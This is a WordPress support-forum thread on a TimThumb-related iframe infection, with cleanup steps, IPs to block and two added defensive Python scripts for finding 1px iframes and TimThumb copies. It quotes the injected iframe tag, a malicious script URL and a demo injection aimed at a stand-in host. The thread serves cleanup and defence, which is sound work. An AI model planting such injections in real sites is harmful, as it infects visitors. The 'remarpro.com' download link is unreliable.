[TimThumb Vulnerability] iframe hack
-
Hi,
does somebody have more info about
<iframe id="iframe" style="width: 1px; height: 1px;" src=" https://counter-wordpress.com/frame.php"> <html> <head> </head> <body> </body> </html> </iframe>
Somebody hacked all my WP sites…
THX to all who will help.
-
You do not need to wipe your site.
Make sure you set the WP-config up correctly. You need to have the database info the same, with the same prefix and everything.
I had the same problem. Maybe it comes from an old version of TimThumb:
https://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/
I use The Dawn for my website. I changed timthumb.php to put in the new version.
I’ve also checked the wp-config.php file and removed the code. It’s working now (without uploading a fresh version of WordPress). Whatever, I will upload a fresh version of WordPress, just to be sure.
Hello everyone. I got this malware on all my sites running on webhostingpad servers a few days back. Even fresh wordpress installations that I did using the cpanel software Softaculous had this malware. I suspect the malware is probably in the softaculous software of my hosting company.
Anyway, I have successfully removed the malware following the steps below (which were already mentioned by some previous users) and which did not require a completely fresh installation of WordPress.
Step 1) Run a scan on https://sitecheck.sucuri.net/scanner/
Step 2) It showed me an error in 2 javascript files in wp-includes
Step 3) Take a backup of wp-includes and then delete the folder
Step 4) Download wordpress from www.remarpro.com
Step 5) Copy wp-includes from this fresh copy to the appropriate location in your server.
In one of the installations, there was a malware detected in this plugin called front-slider. It was in the jquery file. I downloaded a fresh copy of front-slider and deleted the existing jquery file on the server and then copied the file from the fresh download.
Step 6) Open a new browser and run the scan of your website again on https://sitecheck.sucuri.net/scanner/. Hopefully it should not detect any more malware.
Step 7) Change your hosting/cpanel passwords, wp-admin passwords
Step 8) In case you are using chrome, clear your browsing history and everything (or perhaps open an incognito window). Open your website and it should open just fine.
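The comparison behind steps 3 to 6, as an added example that is not part of the original post: a Python script that hashes a live `wp-includes` against a freshly downloaded copy and flags 1px iframes like the one quoted at the top of the thread. The directory names, file contents and the `malware.example` host are constructed for the demo.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# An <iframe> sized to 1px, like the injected tag quoted in the first post.
TINY_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*[:=]\s*[\"']?\s*1(?:px)?\b[^>]*>", re.I)

def tree_hashes(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def compare_trees(live_dir, clean_dir):
    """Report files changed, added or missing relative to the clean copy."""
    live, clean = tree_hashes(live_dir), tree_hashes(clean_dir)
    return {
        "modified": sorted(f for f in live if f in clean and live[f] != clean[f]),
        "unexpected": sorted(f for f in live if f not in clean),
        "missing": sorted(f for f in clean if f not in live),
    }

def find_tiny_iframes(root, suffixes=(".php", ".js", ".html", ".htm")):
    """List files under root whose text contains a 1px iframe tag."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if p.is_file() and p.suffix.lower() in suffixes
                  and TINY_IFRAME.search(p.read_text(errors="replace")))

def demo():
    """Constructed sample: a clean wp-includes and a tampered live copy."""
    inject = ("document.write('<iframe style=\"width: 1px; height: 1px;\" "
              "src=\"https://malware.example/frame.php\"></iframe>');\n")
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            (root / "js").mkdir(parents=True)
            (root / "js" / "jquery.js").write_text("/* library code */\n")
            (root / "version.php").write_text("<?php // placeholder\n")
        with open(live / "js" / "jquery.js", "a") as fh:
            fh.write(inject)
        (live / "js" / "extra.php").write_text("<?php // not in the release\n")
        return compare_trees(live, clean), find_tiny_iframes(live)

if __name__ == "__main__":
    print(demo())
```

Files listed as `unexpected` are the ones a plain overwrite of `wp-includes` would leave behind, which is why step 3 deletes the folder before copying the fresh one in.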
I got the same malware notice from chrome minutes ago. One month ago, I transferred to a different host and this is the first time the site got struck with malware.
And yes, wp-config.php has all those “extras” code in it. I deleted it and nothing changed.
Luckily, I had made a backup (using xcloner) 2 weeks ago. I deleted all the files, and restored the entire site. As of now, it’s working fine. I’m not sure why this happens, I kept all the plugins updated.
It is ironic that my WordPress sites which I did not upgrade to the new version did not get this malware. Could it be that the new WordPress was susceptible?
@sidgoyal1: I think it’s the hosting company who’s vulnerable. I have two sites with them, and both got the malware notice. Those hosted in another hosting were okay.
sidgoyal1 – No, it has nothing to do with your WP version.
Yup, we got the same hacks yesterday on 2 of our sites. Thanks for posting this info. We’ve done what’s shown in this thread and so far so good.
+1 for the WordPress community!
Here is what I found, maybe somebody can do something about this, I’m just trying to help with this info
https://flickr.com.m0.sk/fcuk.php
that bogus site redirects to :
maybe somebody can report to their host or something
What I found is that you really need to remove all external site links from your timthumb file & put a false on allow external
also block this hosting :
nsset: NSSID:VSHOSTING
nserver: ns1.vshosting.cz (78.24.8.150)
nserver: ns2.vshosting.cz (89.235.0.2)
93.185.101.245 !
188.95.124.59 ! & this is the hosting where the script came from
ns.gransy.com A 77.78.104.149
72.26.225.234
85.25.73.97
79.172.193.112
74.220.215.87 !
That fcuk.php is a lengthy script. I’ve decoded it and put the results at PasteBin:
It looks like some more encoded code around line 1602. I’ll have to look at that later.
I know the last post was over 3 days ago but just to inform, I went ahead and used the old database after deleting the WordPress files and keeping the upload directory, etc.
My site is clean of infection. Just do as Ipstenu said and you’ll be fine. Try not to overcomplicate it, simply follow the instructions laid out and you’ll be back to green meadows in no time.
The only thing different that I did was that I deleted the old database user (and consequently removed the permissions) and created a new database user with a new password and added them to a NEW wp-config.php file… the last one had code injected within it. Nasty stuff.
The only thing different that I did was that I deleted the old database user (and consequently removed the permissions) and created a new database user with a new password and added them to a NEW wp-config.php file… the last one had code injected within it. Nasty stuff.
That’s a great call
Guys, just got a malware report from Sucuri – anyone seen this one? I assume I need to do the same as some of the above comments?
Cheers, Andy
[Code moderated as per the Forum Rules. Please use the pastebin]
andyd69 – If you’ve been hacked, yes.
At this point, we’re at 3 pages and it’s the same story, so here’s the skinny.
If you’ve been hacked by this, you need to, in addition to the normal cleanups, make sure you remove TimThumb’s susceptible version from your server.
Closing, as this will be impossible to help anyone new.
- The topic ‘[TimThumb Vulnerability] iframe hack’ is closed to new replies.
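An added example, not part of the thread and not TimThumb's own code: an inventory script for the advice above to remove the susceptible TimThumb and to "put a false on allow external". It finds TimThumb copies under a web root whatever the file is named and reports the version and external-fetch settings each one declares. The `VERSION`, `ALLOW_EXTERNAL` and allowed-sites patterns are assumptions about how the script declares them, and the sample file and paths are constructed.

```python
import re
import tempfile
from pathlib import Path

# Assumed declaration forms (not shown in the thread): define('VERSION', ...),
# define('ALLOW_EXTERNAL', ...) and an array named $allowedSites or $ALLOWED_SITES.
VERSION = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
ALLOW_EXT = re.compile(r"define\s*\(\s*['\"]ALLOW_EXTERNAL['\"]\s*,\s*(\w+)", re.I)
SITES = re.compile(r"\$allowed_?sites\s*=\s*array\s*\((.*?)\)\s*;", re.I | re.S)

# Constructed sample, not a real TimThumb release.
SAMPLE = """<?php
// TimThumb (constructed sample)
define ('VERSION', '0.0-sample');
if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE);
$ALLOWED_SITES = array (
    'flickr.com',
    'picasa.com',
);
"""

def inspect_timthumb(source):
    """Return the declared version and external-fetch settings, or None if not TimThumb."""
    ver, sites = VERSION.search(source), SITES.search(source)
    if "timthumb" not in source.lower() or not (ver or sites):
        return None
    ext = ALLOW_EXT.search(source)
    hosts = re.findall(r"['\"]([^'\"]+)['\"]", sites.group(1)) if sites else []
    return {"version": ver.group(1) if ver else None,
            "allow_external": ext.group(1).lower() if ext else None,
            "allowed_sites": hosts}

def find_timthumb(root):
    """Inspect every .php file under root, whatever the file is called."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): info for p in sorted(root.rglob("*.php"))
            if (info := inspect_timthumb(p.read_text(errors="replace")))}

def demo():
    """Build a constructed web root with one renamed copy and one unrelated file."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp, "wp-content", "themes", "sample-theme")
        (theme / "scripts").mkdir(parents=True)
        (theme / "scripts" / "thumb.php").write_text(SAMPLE)
        (theme / "functions.php").write_text("<?php // calls scripts/thumb.php via timthumb\n")
        return find_timthumb(tmp)
```

Any copy reported with `allow_external` set to `true` or a non-empty `allowed_sites` list is a candidate for replacement with the current release or removal.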